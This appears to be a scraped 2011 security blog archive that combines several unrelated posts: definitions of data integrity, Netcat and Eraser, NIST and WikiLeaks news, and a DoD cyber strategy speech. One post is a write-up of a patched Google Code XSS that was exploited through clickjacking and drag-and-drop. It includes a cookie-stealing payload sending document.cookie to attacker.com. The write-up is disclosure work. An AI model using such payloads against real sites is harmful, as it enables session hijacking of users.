Data integrity

Data integrity is data that has a complete or whole structure. All characteristics of the data including business rules, rules for how pieces of data relate, dates, definitions and lineage must be correct for data to be complete.

Per the discipline of data architecture, when functions are performed on the data the functions must ensure integrity. Examples of functions are transforming the data, storing the history, storing the definitions (Metadata) and storing the lineage of the data as it moves from one place to another. The most important aspect of data integrity per the data architecture discipline is to expose the data, the functions and the data’s characteristics.

Data that has integrity is identically maintained during any operation (such as transfer, storage or retrieval). Put simply in business terms, data integrity is the assurance that data is consistent, certified and can be reconciled.

In terms of a database data integrity refers to the process of ensuring that a database remains an accurate reflection of the universe of discourse it is modelling or representing. In other words there is a close correspondence between the facts stored in the database and the real world it models

Types of integrity constraintsData integrity is normally enforced in a database system by a series of integrity constraints or rules. Three types of integrity constraints are an inherent part of the relational data model: entity integrity, referential integrity and domain integrity.

Entity integrity concerns the concept of a primary key. Entity integrity is an integrity rule which states that every table must have a primary key and that the column or columns chosen to be the primary key should be unique and not null.

Referential integrity concerns the concept of a foreign key. The referential integrity rule states that any foreign key value can only be in one of two states. The usual state of affairs is that the foreign key value refers to a primary key value of some table in the database. Occasionally, and this will depend on the rules of the business, a foreign key value can be null. In this case we are explicitly saying that either there is no relationship between the objects represented in the database or that this relationship is unknown.

Domain integrity specifies that all columns in relational database must be declared upon a defined domain. The primary unit of data in the relational data model is the data item. Such data items are said to be non-decomposable or atomic. A domain is a set of values of the same type. Domains are therefore pools of values from which actual values appearing in the columns of a table are drawn.

If a database supports these features it is the responsibility of the database to insure data integrity as well as the consistency model for the data storage and retrieval. If a database does not support these features it is the responsibility of the application to insure data integrity while the database supports the consistency model for the data storage and retrieval.

Having a single, well controlled, and well defined data integrity system increases stability (one centralized system performs all data integrity operations), performance (all data integrity operations are performed in the same tier as the consistency model), re-usability (all applications benefit from a single centralized data integrity system), and maintainability (one centralized system for all data integrity administration).

Today, since all modern databases support these features (see Comparison of relational database management systems), it has become the defacto responsibility of the database to insure data integrity. Out-dated and legacy systems that use file systems (text, spreadsheets, ISAM, flat files, etc.) for their consistency model lack any kind of data integrity model. This requires companies to invest a large amount of time, money, and personnel in the creation of data integrity systems on a per application basis that effectively just duplicate the existing data integrity systems found in modern databases. Many companies, and indeed many database systems themselves, offer products and services to migrate out-dated and legacy systems to modern databases to provide these data integrity features. This offers companies a substantial savings in time, money, and resources because they do not have to develop per application data integrity systems that must be re-factored each time business requirements change.

Categories: Uncategorized

The GNU Netcat

What is Netcat?

Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.
It is designed to be a reliable “back-end” tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

It provides access to the following main features:
Outbound and inbound connections, TCP or UDP, to or from any ports.
Featured tunneling mode which allows also special tunneling such as UDP to TCP, with the possibility of specifying all network parameters (source port/interface, listening port/interface, and the remote host allowed to connect to the tunnel.
Built-in port-scanning capabilities, with randomizer.
Advanced usage options, such as buffered send-mode (one line every N seconds), and hexdump (to stderr or to a specified file) of trasmitted and received data.
Optional RFC854 telnet codes parser and responder.

The GNU Netcat is distributed freely under the GNU General Public License (GPL).

——————————————————————————–

Project Goals

Although the project development is marked as beta, GNU Netcat is already enough stable for everyday use.
Goals of this project are full compatibility with the original nc 1.10 that is widely used, and portability. GNU Netcat should compile and work without changes on the following hosts:
Linux (test host: alphaev67-unknown-linux-gnu)

FreeBSD (test host: i386-unknown-freebsd4.9)

NetBSD (test host: i386-unknown-netbsdelf1.6.1)

SunOS/Solaris (test host: sparc-sun-solaris2.9)

MacOS X (test host: powerpc-apple-darwin6.8)

Other operating systems could be supported with minor source modifications, since the code has been written following the GNU coding standard conventions.
If you find a bug or you want to report a successfull build on another OS, use the bug tracking system.

Soon the project will split releases between “stable” releases and “development” releases to improve development speed and the introduction of new features without requiring too much testing.

For further information, see the README and ChangeLog files in the package.
If you are courageous enough to try the newest development version or you want to contribute patches, you may want to check out the version in the CVS repository.

Categories: Uncategorized

Eraser

Eraser is an advanced security tool for Windows which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Eraser is currently supported under Windows XP (with Service Pack 3), Windows Server 2003 (with Service Pack 2), Windows Vista, Windows Server 2008, Windows 7 and Windows Server 2008 R2. Eraser is Free software and its source code is released under GNU General Public License. Why Use Eraser?Most people have some data that they would rather not share with others – passwords, personal information, classified documents from work, financial records, self-written poems, the list continues. Perhaps you have saved some of this information on your computer where it is conveniently at your reach, but when the time comes to remove the data from your hard disk, things get a bit more complicated and maintaining your privacy is not as simple as it may have seemed at first. Your first thought may be that when you ‘delete’ the file, the data is gone. Not quite, when you delete a file, the operating system does not really remove the file from the disk; it only removes the reference of the file from the file system table. The file remains on the disk until another file is created over it, and even after that, it might be possible to recover data by studying the magnetic fields on the disk platter surface. Before the file is overwritten, anyone can easily retrieve it with a disk maintenance or an undelete utility. There are several problems in secure file removal, mostly caused by the use of write cache, construction of the hard disk and the use of data encoding. These problems have been taken into consideration when Eraser was designed, and because of this intuitive design and a simple user interface, you can safely and easily erase private data from your hard drive. Eraser Features•It works with Windows XP (with Service Pack 3), Windows Server 2003 (with Service Pack 2), Windows Vista, Windows Server 2008, Windows 7 and Windows Server 2008 R2 ◦Windows 98, ME, NT, 2000 can still be used with version 5.7! •It works with any drive that works with Windows •Secure drive erasure methods are supported out of the box •Erases files, folders and their previously deleted counterparts •Works with an extremely customisable Scheduler

Categories: Uncategorized

Exploitation of “Self-Only” Cross-Site Scripting in Google Code

April 11, 2011 Leave a comment

As an attempt to contribute for Google’s Rewarding Web Application Security Research, I started working on Google Code in search of vulnerabilities that could qualify for the reward program. That is where I came across a Cross-site Scripting bug which seems “not exploitable” at first. As Google has patched the vulnerable pages, I’m going to explain the exploitation of this bug here.

“Self-Only” Cross-Site Scripting

“Self-Only” XSS term is referred in past by many researchers for “CSRF Protected XSS”. You can read it here and here. The issue I found in Google Code site was not related to “CSRF protected XSS”. I referred this bug as “Self-Only” XSS due to its nature because this was not a GET or POST XSS and was only exploited by the victim. This means that the victim has to type “<script>alert(document.cookie)</script>” in the input box and click “Go!” to get his own cookies. Confused! OK. I’ll try to explain this with Google Code example.

Cross-Site Scripting in Google Code

Google Code hosts the documentation for Google APIs. The Google MAP API documentation includes the examples pages to demonstrate different map functions. One of them is “Simple Geocoding” example. The link for this page is:

This page displays geo-location of the requested location on the map. The page makes a GET request to Google Map API and displays the result.

When requested with a valid location followed by XSS payload e.g. pune<script>alert(document.cookie)</script>, makes following GET request to Google Map API :

Google Map API returns JSON response to the request as below:

This response is rendered by the example page at Google Code as below:

And executes the payload in victim’s browser:

This is due to lack of sanitization of malicious data while rendering the output back to the example page.

A quick analysis for request/response reveals that this XSS cannot be exploited by classical GET or POST method. As an attacker, we cannot control any request that can be used to craft payload and when sent to the victim, it executes in his/her browser. For successful attack, the victim has to type himself/herself XSS payload in the vulnerable input box and click “Go!” button. That is what I referred as “Self-Only” XSS.

Exploitation

During the discussion with Lavakumar, he suggested to check for possible Clickjacking with HTML5 Drag and Drop exploit.

The target page was vulnerable to clickjacking and after spending few hours, I was able to craft a working POC for this attack. Here is the scenario and details:

An attacker hosts a Drag and Drop game which convince the victim to perform Drag and Drop operations. The game page renders the vulnerable Google Code page in an invisible iframe. It also has an element link this:

<div draggable=”true” ondragstart=”event.dataTransfer.setData(‘text/plain’, ‘Evil data’)“><h3>DRAG ME!!</h3></div>

When the victim starts dragging this, the event’s data value is set to ‘Evil Data’. Victim drops the element on to a text field inside an invisible iframe which populates the ‘Evil Data’. Victim clicks a dummy button which is placed onto the “Go!” button from vulnerable page.

This is how the PoC looks like:

The victim drags the text to input field which holds the XSS payload.

Then he/she clicks on the “Go!!” button.

Bingo!!

The Attack – Cookie Stealing

By changing the ‘Evil Data’ in Drag and Drop element, pointed to the attacker’s cookie grabbing script, a successful cookie stealing attack can be performed.

<div draggable=”true” ondragstart=”event.dataTransfer.setData(‘text/plain’, ‘<script>document.location=\’http://attacker.com/google/grab.php?cookie=\’+document.cookie</script>’)”><h3>DRAG ME!!</h3></div>
Categories: Uncategorized

NIST Issues Final Version of Full Virtualization Security Guidelines

March 13, 2011 Leave a comment

The National Institute of Standards and Technology (NIST) has issued the final version of its recommendations for securely configuring and using full computing virtualization technologies. The security recommendations are contained in the Guide to Security for Full Virtualization Technologies (NIST Special Publication (SP) 800-125). The draft report was issued for public comment in July 2010.

Virtualization adds a low-level software layer that allows multiple, even different operating systems and applications to run simultaneously on a host. “Full virtualization” provides a complete simulation of underlying computer hardware, enabling software to run without any modification. Because it helps maximize the use and flexibility of computing resources—multiple operating systems can run simultaneously on the same hardware—full virtualization is considered a key technology for cloud computing, but it introduces new issues for IT security.

For cloud computing systems in particular, full virtualization can increase operational efficiency because it can optimize computer workloads and adjust the number of servers in use to match demand, thereby conserving energy and information technology resources. The guide describes security concerns associated with full virtualization technologies for server and desktop virtualization and provides recommendations for addressing these concerns. Most existing recommended security practices also apply in virtual environments and the practices described in this document build on and assume the implementation of practices described in other NIST computer security publications.

The guide is intended for system administrators, security program managers, security engineers and anyone else involved in designing, deploying or maintaining full virtualization technologies. NIST SP 800-125 recommends organizations:

  • secure all elements of a full virtualization solution and maintain their security;
  • restrict and protect administrator access to the virtualization solution;
  • ensure that the hypervisor, the central program that runs the virtual environment, is properly secured; and
  • carefully plan the security for a full virtualization solution before installing, configuring and deploying it.

NIST SP 800-125, Guide to Security for Full Virtualization Technologies may be downloaded from the http://csrc.nist.gov/publications/nistpubs/800-125/SP800-125-final.pdf.

 

Categories: Uncategorized

Judge Won’t Stop WikiLeaks Twitter-Records Request

March 13, 2011 Leave a comment

The U.S. government is getting closer to getting data from Twitter about various associates of WikiLeaks.

The people whose Twitter records were being requested had moved to throw out the government’s request for data, but a judge denied that motion Friday, ruling that the associates don’t have standing to challenge it.

The judge also denied a request to unseal the government’s application for the Twitter order.

Judge Theresa Buchanan, in the Eastern District of Virginia, ruled that because the government was not seeking the content of the Twitter accounts in question (.pdf), the subjects did not have standing to challenge the government’s request for the records. Content, under the Stored Communications Act, is “any information concerning the substance, purport, or meaning of that communication.”

The government is looking for data about the Twitter users’ accounts and how they are used, not the content of tweets or direct messages. It’s the Twitter equivalent of a list of incoming and outgoing phone numbers.

“The Twitter Order does not demand the contents of any communication,” Judge Buchanan wrote in her opinion, “and thus constitutes only a request for records under [the law].”

The Justice Department served Twitter last December with an order seeking information on several people associated with the secret-spilling site WikiLeaks: Birgitta Jonsdottir, a member of Iceland’s parliament; Julian Assange, founder of WikiLeaks; Bradley Manning, suspected of leaking classified information to WikiLeaks; WikiLeaks’ U.S. representative Jacob Appelbaum; and Dutch businessman and activist Rop Gonggrijp. Jonsdottir and Gonggrijp helped WikiLeaks prepare a classified U.S. Army video that the site published last April.

While the application for the Twitter order is still sealed, the court unsealed the order itself, at Twitter’s request. According to the order, the government seeks full contact details for the accounts (including phone numbers and addresses), IP addresses used to access the accounts, connection records (“records of session times and durations”) and data-transfer information, such as the size of data file sent to someone else and the destination IP.

Since Twitter is used for sending 140-character updates, not data files, the wording of the request suggests that it’s likely a boilerplate form that could also have been submitted to ISPs, e-mail providers and social networking sites like Facebook.

The Justice Department’s demand for the records is part of a grand jury investigation that appears to be probing WikiLeaks for its high-profile leaks of classified U.S. material. It is seeking the records under 18 USC 2703(d), a provision of the 1994 Stored Communications Act that governs law enforcement access to non-content internet records, such as transaction information.

More powerful than a subpoena, but not as strong as a search warrant, a 2703(d) order is supposed to be issued when prosecutors provide a judge with “specific and articulable facts” that show the information they seek is relevant and material to a criminal investigation. But the people targeted in the records demand don’t have to themselves be suspected of criminal wrongdoing.

After Twitter notified Jonsdottir in January that the government had sought information about her account, the EFF and the ACLU filed a motion challenging the government’s attempt to obtain the records, asking the court to vacate the order. In their motion, the two groups said the government’s demand for the records violated First Amendment speech rights and Fourth Amendment privacy rights of the Twitter-account holders, among other things.

The groups also filed motions to unseal records in the case, hoping to gain information about the government’s grounds for seeking the records, as well as any information that might indicate if the government had sought similar records from Facebook, ISPs or other service providers.

A hearing to discuss the motion to vacate the Twitter order was held in mid-February.

In her ruling Friday, Buchanan discussed whether the government provided sufficient justification in its application to obtain the records. She acknowledged that the complainants were facing an uphill battle in arguing against the legitimacy of the government’s request, because the government’s application is still sealed and therefore unavailable to them. Nonetheless, she concluded that the government’s application stated “specific and articulable” facts that were sufficient for issuing the Twitter order:

The disclosures sought are “relevant and material” to a legitimate law enforcement inquiry. Also, the scope of the Twitter Order is appropriate even if it compels disclosure of some unhelpful information. Indeed, §2703(d) is routinely used to compel disclosure of records, only some of which are later determined to be essential to the government’s case. Thus, the Twitter Order was properly issued pursuant to §2703(d).

Buchanan further ruled that the request did not violate the account holder’s First Amendment rights, because the order did not seek to control their speech or their associations. Nor did it violate the Fourth Amendment, because the account holders did not have a reasonable expectation of privacy over subscriber information they freely provided to Twitter.

“Similarly, the Fourth Amendment permits the government to warrantlessly install a pen register to record numbers dialed from a telephone, because a person voluntarily conveys the numbers without a legitimate expectation of privacy,” Judge Buchanan wriote.

Attorneys with the EFF and ACLU told Threat Level they plan to appeal the decision.

“Case law from the Supreme Court makes it clear that individuals have a right to challenge government requests for information about them,” said ACLU attorney Aden Fine. “This decision permits the government to obtain court orders requiring the disclosure of private information in secret. That’s not how our system works.”

He also disputed Judge Buchanan’s assertion that users have no expectation of privacy over data they willingly give Twitter and other third parties.

“She’s essentially saying there are no constitutional interests at stake here, because this is all public information,” he said. “But just because a third party has some information, does not mean you have no Fourth Amendment right in that information. Everything that’s at issue here is private information. Most people reasonably believe that that information will be kept private. That’s why in our view the court got it wrong.”

Twitter said in a statement that its policy is “designed to allow users to defend their own rights. As such, Twitter will continue to let the judicial process run its course.”

Photo: Birgitta Jonsdottir, a member of Iceland’s parliament. (Friðrik Tryggvason/Wikimedia Commons)


 

Categories: Uncategorized

US Deputy Defense Secretary Reveals ‘Cyber 3.0′ Details

March 13, 2011 Leave a comment

Addressing what he called “the most technically sophisticated audience,” US Deputy Secretary of Defense William Lynn III took the RSA Conference stage on Tuesday to discuss the Armed Forces’ role in defending a new domain: cyberspace.

“Information technology is at the core of our most important military capabilities,” Lynn told the crowd of thousands of security experts.  “It gives us the ability to navigate with accuracy, to communicate with certainty, to see the battlefield with clarity, and to strike with precision. But for all the wonderful capabilities technology enables in our military, it also introduces enormous vulnerabilities.”

Referencing one major vulnerability in particular, Lynn said the 2008 breach of US military networks by a foreign intelligence agency’s corrupt thumb drive caused a change in demeanor on how the Defense Department approaches its take on cybersecurity.

“It was our worst fear: a rogue program operating silently on our system, poised to deliver operation plans into the hands of an enemy,” said the deputy secretary. “Unfortunately the cyber threat continues to mature, posing dangers to our security that far exceed the 2008 breach of our classified systems.”

Noting the recent cyber intrusions in the oil and gas industry, as well as NASDAQ and Google attacks, Lynn pointed out that cyber threats are occurring on both government and commercial systems, thereby stressing the need for the public and private sectors to work together to protect the nation.

While Lynn classified most cyber attacks against the US government and industry as exploits that are “relatively unsophisticated in nature,” he went on to stress, “In the future, more capable adversaries could potentially immobilize networks on a wider scale, for much longer periods of time.”

In particular, Lynn focused on the threat that terrorists could pose if given the resources and capabilities to launch an attack.

“Al-Qaeda, which has vowed to unleash cyber attacks, has not yet done so, but it is possible for a terrorist group to develop cyber attacks tools on their own, or even to buy them on the black market,” Lynn suggested.

To develop a proactive cyber defense, the deputy secretary revealed five pillars to be laid out in a forthcoming Defense Department comprehensive cyber strategy being called ‘Cyber 3.0.’

“First, the Defense Department has formally recognized cyberspace as a new domain of warfare, like air, land, sea and space,” Lynn said, noting that the first pillar of Cyber 3.0 would entail the military defending all US networks, as they do for physical US territories.

Additional pillars of Cyber 3.0 include: equipping US networks with active defenses, rather than post-attack cleanup; ensuring that the critical infrastructure the military relies on is protected; building collective defenses with US allies; and positioning the nation’s technological and human resources to ensure that the country retains its preeminent capabilities in cyberspace.

“Throughout American history, at moments of great challenge and crisis, industry and the private sector have stood up, partnered with government and developed the capabilities to keep our country safe,” Lynn noted.  “The incredible technologies that have resulted – including the Internet itself – have made our military the most effective fighting force in the world and our economy the most advanced of any nation.”

 

Categories: Uncategorized
Follow

Get every new post delivered to your Inbox.